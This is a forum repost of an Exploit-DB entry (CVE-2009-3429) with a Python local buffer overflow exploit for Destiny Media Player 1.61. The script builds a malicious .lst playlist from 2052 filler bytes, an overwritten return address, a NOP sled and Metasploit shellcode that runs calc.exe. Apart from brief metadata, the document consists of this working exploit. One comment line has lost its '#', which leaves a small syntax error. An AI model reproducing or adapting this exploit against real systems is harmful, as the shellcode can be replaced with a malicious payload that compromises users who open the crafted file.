- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7654
- Проверка EDB
-
- Пройдено
- Автор
- ENCRYPT3D.M!ND
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2009-3429
- Дата публикации
- 2009-01-04
Код:
# Destiny Media Player 1.61 (lst File) Local Buffer overflow Exploit
# By:Encrypt3d.M!nd
#
# i was so stupid when i wrote the poc coz i didn't realize somethings :p
# well this is workin exploit tested on windows xp sp3
# don't double click the file,import it from the program
#
# Greetz:-=Mizo=-(thnx dude :X),L!0N,El Mariachi,MiNi SpIder,all my friends
#
chars = "A" * 2052
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164
Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13"
"\x88\x79\x7b\x83\xeb\xfc\xe2\xf4\xef\x60\x3d\x7b\x13\x88\xf2\x3e"
"\x2f\x03\x05\x7e\x6b\x89\x96\xf0\x5c\x90\xf2\x24\x33\x89\x92\x32"
"\x98\xbc\xf2\x7a\xfd\xb9\xb9\xe2\xbf\x0c\xb9\x0f\x14\x49\xb3\x76"
"\x12\x4a\x92\x8f\x28\xdc\x5d\x7f\x66\x6d\xf2\x24\x37\x89\x92\x1d"
"\x98\x84\x32\xf0\x4c\x94\x78\x90\x98\x94\xf2\x7a\xf8\x01\x25\x5f"
"\x17\x4b\x48\xbb\x77\x03\x39\x4b\x96\x48\x01\x77\x98\xc8\x75\xf0"
"\x63\x94\xd4\xf0\x7b\x80\x92\x72\x98\x08\xc9\x7b\x13\x88\xf2\x13"
"\x2f\xd7\x48\x8d\x73\xde\xf0\x83\x90\x48\x02\x2b\x7b\x78\xf3\x7f"
"\x4c\xe0\xe1\x85\x99\x86\x2e\x84\xf4\xeb\x18\x17\x70\xa6\x1c\x03"
"\x76\x88\x79\x7b")
file=open('exp.lst','w')
file.write(chars+"\xD0\x69\x83\x7c"+"\x90"*15+shellcode)
file.close()
# milw0rm.com [2009-01-04]
- Источник
- www.exploit-db.com